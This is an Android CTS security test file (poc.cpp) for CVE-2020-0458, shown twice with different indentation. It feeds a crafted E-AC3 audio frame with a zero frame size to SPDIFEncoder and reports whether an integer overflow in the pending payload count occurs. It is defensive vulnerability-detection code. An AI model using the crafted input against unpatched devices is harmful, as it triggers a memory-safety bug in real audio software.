hostsidetests/securitybulletin/securityPatch/CVE-2020-0458/poc.cpp - platform/cts - Git at Google

 /**
  * Copyright (C) 2022 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
  * You may obtain a copy of the License at
  *
  *      http://www.apache.org/licenses/LICENSE-2.0
  *
  * Unless required by applicable law or agreed to in writing, software
  * distributed under the License is distributed on an "AS IS" BASIS,
  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */

 #include <stdlib.h>
 #include <audio_utils/spdif/SPDIFEncoder.h>
 #include "../includes/common.h"

 // Taken as a reference from audio_utils/tests/spdif_tests.cpp "MySPDIFEncoder"
 class PocSPDIFEncoder : public android::SPDIFEncoder {
  public:

     explicit PocSPDIFEncoder(audio_format_t format)
             : SPDIFEncoder(format) {
     }

     PocSPDIFEncoder() = default;

     size_t getBurstBufferSizeBytes() const {
         return mBurstBufferSizeBytes;
     }

     size_t getByteCursor() const {
         return mByteCursor;
     }

     android::FrameScanner *getFramer() const {
         return mFramer;
     }

     size_t getPayloadBytesPending() const {
         return mPayloadBytesPending;
     }

     ssize_t writeOutput(const void*, size_t numBytes) override {
         mOutputSizeBytes = numBytes;
         return numBytes;
     }

     size_t mOutputSizeBytes = 0;
 };

 int main() {
     PocSPDIFEncoder encoder(AUDIO_FORMAT_E_AC3);

     // Beginning of the file channelcheck_48k6ch.eac3 with frame size
     // forced to zero
     uint8_t buf[] = { 0x0B, 0x77, 0x00, 0x00, 0x3F, 0x85, 0x7F, 0xE8, 0x1E,
             0x40, 0x82, 0x10, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03,
             0xFC, 0x60, 0x80, 0x7E, 0x59, 0x00, 0xFC, 0xF3, 0xCF, 0x01, 0xF9,
             0xE7 };
     encoder.write(buf, sizeof(buf));

     size_t bufferSize = encoder.getBurstBufferSizeBytes();

     // If vulnerability is present, 'mPayloadBytesPending' will be assigned
     // a large overflowed value
     size_t pendingBytes = encoder.getPayloadBytesPending();

     // 'mBurstBufferSizeBytes' shouldn't be lesser than 'mPayloadBytesPending',
     // this will happen if 'mPayloadBytesPending' holds a overflowed value
     return (bufferSize < pendingBytes) ? EXIT_VULNERABLE : EXIT_SUCCESS;
 }
	/**
	* Copyright (C) 2022 The Android Open Source Project
	*
	* Licensed under the Apache License, Version 2.0 (the "License");
	* you may not use this file except in compliance with the License.
	* You may obtain a copy of the License at
	*
	* http://www.apache.org/licenses/LICENSE-2.0
	*
	* Unless required by applicable law or agreed to in writing, software
	* distributed under the License is distributed on an "AS IS" BASIS,
	* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
	* See the License for the specific language governing permissions and
	* limitations under the License.
	*/

	#include <stdlib.h>
	#include <audio_utils/spdif/SPDIFEncoder.h>
	#include "../includes/common.h"

	// Taken as a reference from audio_utils/tests/spdif_tests.cpp "MySPDIFEncoder"
	class PocSPDIFEncoder : public android::SPDIFEncoder {
	public:

	explicit PocSPDIFEncoder(audio_format_t format)
	: SPDIFEncoder(format) {
	}

	PocSPDIFEncoder() = default;

	size_t getBurstBufferSizeBytes() const {
	return mBurstBufferSizeBytes;
	}

	size_t getByteCursor() const {
	return mByteCursor;
	}

	android::FrameScanner *getFramer() const {
	return mFramer;
	}

	size_t getPayloadBytesPending() const {
	return mPayloadBytesPending;
	}

	ssize_t writeOutput(const void*, size_t numBytes) override {
	mOutputSizeBytes = numBytes;
	return numBytes;
	}

	size_t mOutputSizeBytes = 0;
	};

	int main() {
	PocSPDIFEncoder encoder(AUDIO_FORMAT_E_AC3);

	// Beginning of the file channelcheck_48k6ch.eac3 with frame size
	// forced to zero
	uint8_t buf[] = { 0x0B, 0x77, 0x00, 0x00, 0x3F, 0x85, 0x7F, 0xE8, 0x1E,
	0x40, 0x82, 0x10, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03,
	0xFC, 0x60, 0x80, 0x7E, 0x59, 0x00, 0xFC, 0xF3, 0xCF, 0x01, 0xF9,
	0xE7 };
	encoder.write(buf, sizeof(buf));

	size_t bufferSize = encoder.getBurstBufferSizeBytes();

	// If vulnerability is present, 'mPayloadBytesPending' will be assigned
	// a large overflowed value
	size_t pendingBytes = encoder.getPayloadBytesPending();

	// 'mBurstBufferSizeBytes' shouldn't be lesser than 'mPayloadBytesPending',
	// this will happen if 'mPayloadBytesPending' holds a overflowed value
	return (bufferSize < pendingBytes) ? EXIT_VULNERABLE : EXIT_SUCCESS;
	}